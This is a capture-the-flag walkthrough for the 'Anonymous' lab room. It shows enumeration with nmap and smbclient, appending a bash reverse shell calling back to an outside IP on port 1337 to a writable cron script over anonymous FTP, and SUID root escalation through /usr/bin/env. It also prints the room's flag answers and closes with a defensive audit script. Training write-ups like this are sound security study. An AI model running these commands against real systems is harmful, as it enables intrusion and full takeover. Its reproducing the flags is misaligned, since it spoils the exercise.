Anonymous

In this room we use our basic Linux and PrivEsc knowledge to gain access to our machine and get root permissions.

More details here.

Pwn

This guide contains the answers and the steps necessary to get to them for the Anonymous room. This room is similar to some other room, but I can't remember the name at the moment.

  1. Enumerate the machine. How many ports are open?

We first scan the machine for any open ports with the following command:

nmap -sV 10.10.147.121

Nmap Scan

Answer: 4

  1. What service is running on port 21?

This answer can be found in the previous image.

Answer: ftp

  1. What service is running on ports 139 and 445?

Both these answers can be seen in the previous image above.

Answer: smb

  1. There's a share on the user's computer. What's it called?

We can use smbclient to identify the shares available on the target machine.

smbclient -NL //10.10.11.32

Smb Shares

To view the contents of this share we can use:

smbclient -N //10.10.11.32/pics

Smb Share

After going through these files, it appears they are just images of some dogs, which have no further use.

SMB Files

Images

Answer: pics

  1. user.txt

From the nmap scan we found we could connect to the machine through anonymous ftp.

ftp 10.10.75.132

FTP Log In

Looking through the files we see three files in a scripts folder which may be of interest.

FTP Files

We can download them all to our machine to investigate with mget *.

FTP Download Files

Looks like the clean.sh file is a script that runs periodically to remove some files. This gets stored in the log file. We also note that we have write access to this script.

Removed Files Log

Let's find a reverse shell command we can add to this file. We can use pentestmonkey's for this.

Reverse Shell Command

We can now append this to the script we downloaded.

bash -i >& /dev/tcp/10.18.78.136/1337 0>&1

Finished Script

Now all we have to do is upload the file to the server, set up a listener and wait for the script to run.

put clean.sh

FTP Upload

We can check if the command was added using:

curl ftp://10.10.75.132/scripts/clean.sh

Check Script

Now we set up the listener and wait for the incoming connection to be made.

nc -nlvp 1337

Reverse Shell

Now it is time to navigate to the flag and read its contents.

User Flag

Answer: 90d6f992585815ff991e68748c414740

  1. root.txt

In order for us to gain root on this machine we can look for any binaries which have their SUID bit set.

find / -perm -4000 2>/dev/null

Shell SUID

We can use GTFOBins to look for any binaries which don't need sudo or a password. From this list we can use /usr/bin/env.

GTFO

Now we can use this command to get root access on the machine.

/usr/bin/env /bin/bash -p

Root

After a quick check to verify we are indeed root, we can look at the contents of root.txt.

Root Flag

Answer: 4d930091c31a622a7ed10f27999af363
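
From the defender's side, both footholds used above (the world-writable clean.sh in the anonymous FTP share and the SUID bit on /usr/bin/env) can be found with a short audit. The script below is an added example, not part of the original write-up; the function names, the denylist entries other than env, and the paths in the usage line are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): audit a host for the two
# misconfigurations this room is built on. Function names are hypothetical.

# Names that should never be SUID. "env" is the binary used in this room;
# the other entries are an assumed starter list, extend it for your fleet.
SUID_DENYLIST="env bash sh dash python3 perl find"

# List regular files under $1 that every account on the host may modify.
world_writable_files() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# List SUID files under $1 whose basename is on the denylist.
risky_suid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        base=${f##*/}
        case " $SUID_DENYLIST " in
            *" $base "*) printf '%s\n' "$f" ;;
        esac
    done
}

# Run both checks: $1 = directory exposed over FTP/SMB, $2 = tree to scan
# for SUID files. Prints labelled findings; returns 1 if there are any.
audit() {
    findings=$(
        world_writable_files "$1" | sed 's/^/WORLD-WRITABLE: /'
        risky_suid_files "$2"     | sed 's/^/RISKY-SUID: /'
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Usage: ./audit.sh /srv/ftp /     (both paths are assumptions)
if [ "$#" -eq 2 ]; then
    audit "$1" "$2"
fi
```

Each finding is cleared by removing the offending bit, for example `chmod o-w` on the script and `chmod u-s /usr/bin/env`, after which `audit` returns 0.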